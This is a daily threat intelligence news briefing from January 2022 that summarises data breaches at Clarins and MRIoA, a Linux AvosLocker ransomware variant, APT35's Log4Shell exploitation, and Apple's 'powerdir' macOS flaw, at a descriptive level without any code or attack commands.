Cyware Daily Threat Intelligence

Daily Threat Briefing • Jan 11, 2022
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Jan 11, 2022
Today’s threat intelligence briefing has Log4Shell vulnerabilities written all over it. APT35 aka Charming Kitten has emerged as the latest cybercriminal group to exploit one of the Log4Shell flaws to distribute a new PowerShell-based modular backdoor dubbed CharmPower. The critical security flaws also became a reason for a security breach at Clarins. As a result, the personal information of its Singapore customers was leaked online. What’s more disturbing is that despite the release of new versions, the vulnerable and outdated versions of Log4j software were downloaded four million times in a single month.
Never a day passes by when ransomware attacks are not making the news and today, a new version of AvosLocker is making the headlines for encrypting Linux systems by targeting VMware ESXi virtual machines.
Top Breaches Reported in the Last 24 Hours
Clarins hit by a data breach
French cosmetic company Clarins has been hit by a data breach incident that affected the personal information of Singapore customers. The incident occurred as the company failed to patch the Log4Shell vulnerabilities on time. Clarins became aware of the security breach after a staff member could not access the database. The data affected include names, addresses, email, phone numbers, and loyalty program status of customers.
MRIoA discloses a data breach
The Medical Review Institute of America (MRIoA) notified some 134,000 individuals about a data breach that affected their personal information. The incident was discovered on November 9, 2021. The compromised data included names, gender, email addresses, phone numbers, birth dates, Social Security Numbers, and financial information of users.
Top Malware Reported in the Last 24 Hours
New AvosLocker variant spotted
A new Linux version of the AvosLocker ransomware that targets VMware ESXi servers has been spotted by researchers. Once launched on a Linux system, the ransomware terminates all ESXi machines on the server. Later it begins the encryption process and appends the .avoslinux extension to the encrypted files.
Top Vulnerabilities Reported in the Last 24 Hours
Exploitation of Log4Shell
The Charming Kitten threat actor group made attempts to exploit one of the Log4Shell vulnerabilities (CVE-2021-44228) to distribute a new PowerShell-based modular backdoor dubbed CharmPower. The attackers chose JNDI Exploit kits to send a well-crafted request to the victim’s publicly facing resource as part of the infection chain.
Apple fixes ‘powerdir’ flaw
Microsoft has shared details about a vulnerability in Apple’s macOS that could enable attackers to gain unauthorized access to protected user data by bypassing the operating system’s Transparency, Consent, and Control (TTC) technology. Named ‘powerdir’, the flaw is identified with CVE number CVE-2021-30970. Apple fixed the issue in December 2021.